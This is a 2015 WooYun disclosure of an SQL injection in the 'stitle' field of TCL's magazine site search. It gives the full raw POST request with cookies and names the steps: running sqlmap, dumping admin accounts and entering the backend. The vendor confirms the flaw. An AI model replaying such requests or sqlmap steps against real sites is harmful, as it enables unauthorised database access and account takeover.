当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145832

漏洞标题:TCL某平台存SQL注入,已入后台

相关厂商:TCL官方网上商城

漏洞作者: 路人甲

提交时间:2015-10-10 16:51

修复时间:2015-11-26 08:42

公开时间:2015-11-26 08:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

TCL某平台存SQL注入,已入后台

详细说明:

1.漏洞地址:http://magazine.tcl.com/
点击综合查询,标题处有sql注入

QQ截图20151010160742.jpg


POST http://magazine.tcl.com/Default.aspx HTTP/1.1
Host: magazine.tcl.com
Connection: keep-alive
Content-Length: 6452
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://magazine.tcl.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.69
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://magazine.tcl.com/Default.aspx
Accept-Encoding: gzip, deflate, lzma
Accept-Language: zh-CN,zh;q=0.8
Cookie: Jath_b50b_saltkey=Kx877z38; Jath_b50b_lastvisit=1444459536; Jath_b50b_sid=U809pe; Jath_b50b_sendmail=1; pgv_pvi=9884900352; pgv_si=s5924673536; Jath_b50b_lastact=1444463138%09misc.php%09seccode; Jath_b50b_seccode=2246.01b12bbc22b72b9696; ASP.NET_SessionId=1erwefzmbwr3a555yv02ql45
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTk2NDM0OTk5NA9kFgICAg9kFhRmDxUB%2BAo8UD4NCjxUQUJMRSBjZWxsU3BhY2luZz0wIGNlbGxQYWRkaW5nPTAgd2lkdGg9Nzc1IGJvcmRlcj0wPg0KPFRCT0RZPg0KPFRSPg0KPFREIHdpZHRoPTc1NiBjb2xTcGFuPTQ%2BPElNRyBzcmM9Ii9pbWFnZXMvdGNsX3RvcC5qcGciIHdpZHRoPTc4MD4g44CAPC9URD48L1RSPg0KPFRSPg0KPFREIGJnQ29sb3I9IzhmOGY4ZiBoZWlnaHQ9MjAgd2lkdGg9NDM0PjxTUEFOIGNsYXNzPSJ3aGl0ZSBzdHlsZTEgc3R5bGUyIj48U1BBTiBjbGFzcz0id2hpdGUgc3R5bGUxIHN0eWxlMiI%2BJm5ic3A7Jm5ic3A7PEZPTlQgY29sb3I9I2ZmZmZmZj4mbmJzcDs8L0ZPTlQ%2BPFNQQU4gY2xhc3M9c3R5bGUzPjxBIGhyZWY9Ii9kZWZhdWx0LmFzcHgiPjxGT05UIGNvbG9yPSNmZmZmZmY%2B6aaW6aG1PC9GT05UPjwvQT48L1NQQU4%2BPC9TUEFOPjxTUEFOIGNsYXNzPXN0eWxlMz48Rk9OVCBjb2xvcj0jZmZmZmZmPiZuYnNwO3wmbmJzcDs8QSBocmVmPSIvZGVmYXVsdC5hc3B4I3RpcCI%2BPEZPTlQgY29sb3I9I2ZmZmZmZj7mnJ%2FliIrmn6Xor6I8L0ZPTlQ%2BPC9BPjxGT05UIGNvbG9yPSNmZmZmZmY%2BJm5ic3A7PC9GT05UPnwgPEEgaHJlZj0iL21vcmVkb3dubG9hZC5hc3B4Ij48Rk9OVCBjb2xvcj0jZmZmZmZmPuacn%2BWIiuS4i%2Bi9vTwvRk9OVD48L0E%2BJm5ic3A7fCA8QSBocmVmPSIvYWJvdXRUQ0xXYXRjaC5odG1sIj48Rk9OVCBjb2xvcj0jZmZmZmZmPuWFs%2BS6juWKqOaAgTwvRk9OVD48L0E%2BJm5ic3A7fCZuYnNwOzxBIGhyZWY9Ii9lbiI%2BPEZPTlQgY29sb3I9I2ZmZmZmZj5FbmdsaXNoIHZlcnNpb248L0ZPTlQ%2BPC9BPjwvU1BBTj48L1NQQU4%2BPC9GT05UPjwvVEQ%2BDQo8VEQgYmdDb2xvcj0jOGY4ZjhmIHdpZHRoPTEzND48U1BBTiBjbGFzcz0id2hpdGUgc3R5bGUxIHN0eWxlMiBzdHlsZTMiPuacn%2BWIiuiuoumYhSBFbWFpbO%2B8mjwvU1BBTj4gPC9URD4NCjxURCBiZ0NvbG9yPSM4ZjhmOGYgd2lkdGg9ODA%2BPElOUFVUIGlkPUVtYWlsX2JveCBzdHlsZT0iSEVJR0hUOiAyNHB4OyBXSURUSDogNzlweCIgc2l6ZT0xNj4gPC9URD4NCjxURCBiZ0NvbG9yPSM4ZjhmOGYgd2lkdGg9MTI5PjxBIGhyZWY9ImphdmFzY3JpcHQ6RGluZ1l1ZSgnVENMV0FUQ0gwMDAxJyxkb2N1bWVudC5mb3Jtc1swXS5FbWFpbF9ib3gudmFsdWUpIj48SU1HIGJvcmRlcj0wIHNyYz0iL21hbmFnZXIvaW1hZ2VzL3N1YnNjcmlwdGlvbi5naWYiIHdpZHRoPTQ0IGhlaWdodD0xOD48L0E%2BPEEgaHJlZj0iamF2YXNjcmlwdDpUdWlEaW5nKCdUQ0xXQVRDSDAwMDEnLGRvY3VtZW50LmZvcm1zWzBdLkVtYWlsX2JveC52YWx1ZSkiPjxJTUcgYm9yZGVyPTAgc3JjPSIvbWFuYWdlci9pbWFnZXMvdW5zdWJzY3JpcHRpb24uZ2lmIiB3aWR0aD01MCBoZWlnaHQ9MTg%2BPC9BPjwvVEQ%2BPC9UUj48L1RCT0RZPjwvVEFCTEU%2BPC9QPmQCAQ8WAh4LXyFJdGVtQ291bnQCCBYQZg9kFgJmDxUCAzAwMQlUQ0zliqjmgIFkAgEPZBYCZg8VAgMwMDQJVENM56e75YqoZAICD2QWAmYPFQIDMDA1D1RDTOeOi%2BeJjOS4lueVjGQCAw9kFgJmDxUCAzAwMgbmoqbmg7NkAgQPZBYCZg8VAgMwMDMJVENM5biC5Zy6ZAIFD2QWAmYPFQIDMDA3D%2BWbvemZheeUteW3peS6umQCBg9kFgJmDxUCAzAwOAlUQ0zpgJrorq9kAgcPZBYCZg8VAgMwMDYPVENM546L54mM5pyN5YqhZAIDDxAPFgYeC18hRGF0YUJvdW5kZx4NRGF0YVRleHRGaWVsZAUFbW5hbWUeDkRhdGFWYWx1ZUZpZWxkBQNtaWRkEBUBCVRDTOWKqOaAgRUBAzAwMRQrAwFnZGQCBQ8QDxYGHwFnHwIFBWN5ZWFyHwMFBWN5ZWFyZBAVDQQyMDE1BDIwMTQEMjAxMwQyMDEyBDIwMTEEMjAxMAQyMDA5BDIwMDgEMjAwNwQyMDA2BDIwMDUEMjAwNAQyMDAzFQ0EMjAxNQQyMDE0BDIwMTMEMjAxMgQyMDExBDIwMTAEMjAwOQQyMDA4BDIwMDcEMjAwNgQyMDA1BDIwMDQEMjAwMxQrAw1nZ2dnZ2dnZ2dnZ2dnZGQCEA8VAgB8PElNRyBzdHlsZT0iSEVJR0hUOiAxNDVweDsgV0lEVEg6IDIyNXB4IiBib3JkZXI9MCBzcmM9Ii91cGxvYWQvMDAxLzI2Ny8yNjfmnJ%2FliqjmgIHlsIHpnaIlMjAoMSkuanBnIiB3aWR0aD0xNjg4IGhlaWdodD0xMTA2PmQCEQ9kFgJmDw8WAh4EVGV4dAUo44CKVENM5Yqo5oCB44CLMjAxNeW5tOesrDfmnJ8o5oC7MjY45pyfKWRkAhMPZBYCAgEPFgIeB1Zpc2libGVoFgZmD2QWBGYPZBYCZg8WBB4EaHJlZgUUYXJ0aWNsZS5hc3B4P2lkPTg2MTgeBXRpdGxlBTDmjoDotbfkvaDnmoTnm5blpLTmnaXigJTigJTorr9UQ0zmlrDnlobliIblhazlj7gWAmYPDxYIHghJbWFnZVVybAUWdXBsb2FkLzAwMS8yNjgvMDEyLmpwZx4FV2lkdGgbAAAAAADAbEABAAAAHgZIZWlnaHQbAAAAAAAAY0ABAAAAHgRfIVNCAoADZGQCAg9kFgICAQ8PFgQfBAUw5o6A6LW35L2g55qE55uW5aS05p2l4oCU4oCU6K6%2FVENM5paw55aG5YiG5YWs5Y%2B4HgtOYXZpZ2F0ZVVybAUUYXJ0aWNsZS5hc3B4P2lkPTg2MThkZAIBD2QWAgIBDxYCHglpbm5lcmh0bWwFUTwvc3Bhbj4NCjxwIGNsYXNzPW1zb25vcm1hbCBzdHlsZT0idGV4dC1hbGlnbjoganVzdGlmeTsgdGV4dC1qdXN0aWZ5OiBpbnRlci1pZC4uLmQCAg9kFgICAQ9kFgICAQ8PFgQfBAUI6K%2Bm57uGPj4fDAUUYXJ0aWNsZS5hc3B4P2lkPTg2MThkZAIVDxYCHwVnFgQCAQ9kFgQCAQ9kFgJmDxAPFgYfAWcfAgUFbW5hbWUfAwUDbWlkZBAVDQlUQ0zliqjmgIEG5qKm5oOzCVRDTOW4guWcuglUQ0znp7vliqgPVENM546L54mM5LiW55WMD1RDTOeOi%2BeJjOacjeWKoQ%2Flm73pmYXnlLXlt6XkuroJVENM6YCa6K6vCOS5jOS6kTExAzAwMAMwMDAG5LmM5LqRBuWFqOmDqBUNAzAwMQMwMDIDMDAzAzAwNAMwMDUDMDA2AzAwNwMwMDgFMTAwMDEEJ29yIAYnb3IgXFwEdGVzdANhbGwUKwMNZ2dnZ2dnZ2dnZ2dnZ2RkAgMPZBYEZg8QDxYGHwFnHwIFBWN5ZWFyHwMFBWN5ZWFyZBAVDgQyMDE1BDIwMTQEMjAxMwQyMDEyBDIwMTEEMjAxMAQyMDA5BDIwMDgEMjAwNwQyMDA2BDIwMDUEMjAwNAQyMDAzBuWFqOmDqBUOBDIwMTUEMjAxNAQyMDEzBDIwMTIEMjAxMQQyMDEwBDIwMDkEMjAwOAQyMDA3BDIwMDYEMjAwNQQyMDA0BDIwMDMDYWxsFCsDDmdnZ2dnZ2dnZ2dnZ2dnZGQCAg8QDxYGHwFnHwIFBWN1cnFpHwMFBWN1cnFpZBAVCQE4ATcBNgE1ATQBMwEyATEG5YWo6YOoFQkBOAE3ATYBNQE0ATMBMgExA2FsbBQrAwlnZ2dnZ2dnZ2dkZAIED2QWAgIBD2QWBAICDzwrAAoBAA8WBh4LVmlzaWJsZURhdGUGAEAmty%2B50ogeAlNEFgEGEscyGbS50ogfBWhkZAIGDzwrAAoBAA8WBh8OBgDAiq%2FC0NKIHw8WAQYSR5cRR9HSiB8FaGRkAhcPFgIfBWgWAgIBD2QWBAIBD2QWAmYPEA8WAh8BZ2RkFgBkAgMPZBYEZg8QDxYCHwFnZGQWAGQCAg8QDxYCHwFnZGQWAGQCHQ8VAckEPFRBQkxFIGlkPUxpbmsgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz0wIHdpZHRoPSIxMDAlIiBib3JkZXI9MD4NCjxUQk9EWT4NCjxUUj4NCjxURCBiZ0NvbG9yPSNlY2U5ZDggd2lkdGg9MTk0PjxTUEFOIGNsYXNzPXdoaXRlPjwvU1BBTj48L1REPg0KPFREIHdpZHRoPTM2PjwvVEQ%2BDQo8VEQgY2xhc3M9d2hpdGUgYmdDb2xvcj0jZmZlOGQ4IGhlaWdodD0yMCBiYWNrZ3JvdW5kPWltYWdlcy9Cb3R0b21fbGlua19iZy5naWYgd2lkdGg9NDk1IGFsaWduPXJpZ2h0PjxBIGNsYXNzPXdoaXRlIGhyZWY9Ii9hYm91dFRDTFdhdGNoLmh0bWwiPjxGT05UIGNvbG9yPSNmZmZmZmY%2B5YWz5LqOVENMPC9GT05UPjwvQT4mbmJzcDt8Jm5ic3A7PEEgY2xhc3M9d2hpdGUgaHJlZj0ibWFpbHRvOnRhbmd5dEB0Y2wuY29tIj48Rk9OVCBjb2xvcj0jZmZmZmZmPuaKgOacr%2BaUr%2BaMgTwvRk9OVD48L0E%2BJm5ic3A7fCZuYnNwOzxBIGNsYXNzPXdoaXRlIGhyZWY9Im1haWx0bzp0Y2xkdEB0Y2wuY29tIj48Rk9OVCBjb2xvcj0jZmZmZmZmPuiBlOezu%2BaIkeS7rDwvRk9OVD48L0E%2BJm5ic3A7Jm5ic3A7IDwvVEQ%2BPC9UUj48L1RCT0RZPjwvVEFCTEU%2BZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUGYm5zZWVrBQhtZW51c2VlaylWlNv8pAuee6RtEP4wx6iTqutw&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWWgLr7IP0CQKZlKEkAtyDiusFAuX37RMCpuDqxg4CpuD2owcCpuDCGAKm4K71CAKm4LrSAQKm4IaPCgLN2bSWDQLN2YDzBQLN2ayaAwLN2bj3CwLN2YSsBALN2ZCJDQLN2fzlBQL2vJDVCwL3vJDVCwL4vJDVCwLxvJDVCwLyvJDVCwLzvJDVCwL0vJDVCwLtvJDVCwLuvJDVCwL2vNDUCwL2vMzUCwL2vNjUCwL2vNTUCwL2vMDUCwL2vLzUCwL2vMjUCwL2vMTUCwL2vPDUCwL2vOzUCwL3vNDUCwL3vMzUCwL3vNjUCwL3vNTUCwL3vMDUCwLWoOqVCwLijd2WBgLVuYTmBgKalKEkAt%2BDiusFAvqU6MAPAuH9x90JAozHpasEAquog4AOAtax4Z0IAv2a%2F%2BoCAsjwv7QKAoqAibsLApOnuZYOAqmGotwJAu2Ir%2FMOAsfb788KAsL37RMCgeDqxg4CgeD2owcCgeDCGAKB4K71CAKB4LrSAQKB4IaPCgLq2bSWDQLq2YDzBQLq2ayaAwLq2bj3CwLq2YSsBALq2ZCJDQLq2fzlBQKfuKP4CgKNi5qVAwKci5qVAwKfi5qVAwKei5qVAwKZi5qVAwKYi5qVAwKbi5qVAwKai5qVAwLIq%2F6QBQLsiPSpBwKb%2BvTpDgKbgJvpCALN0tLCCAL3t8agDwLN0sbCCAKm%2FOxgAvWFgvUG2rbDIJWnIlo84f4j%2Bphgw9gbmLg%3D&tmid=001&tyear=2015&txtseek=&smid=001&syear=2015&scurqi=8&stitle=%25&swriter=&sbody=&sdate1=&sdate2=&bnfullseek=%B2%E9%D1%AF


其中post数据stitle字段存在sql注入
2.丢到sqlmap,跑库

QQ截图20151010161026.jpg


3.跑出后台用户

QQ截图20151010161115.jpg


4,登录后台

QQ截图20151010161156.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-12 08:40

厂商回复:

已经提交开发人员处理,感谢您对TCL的关注,谢谢!

最新状态:

暂无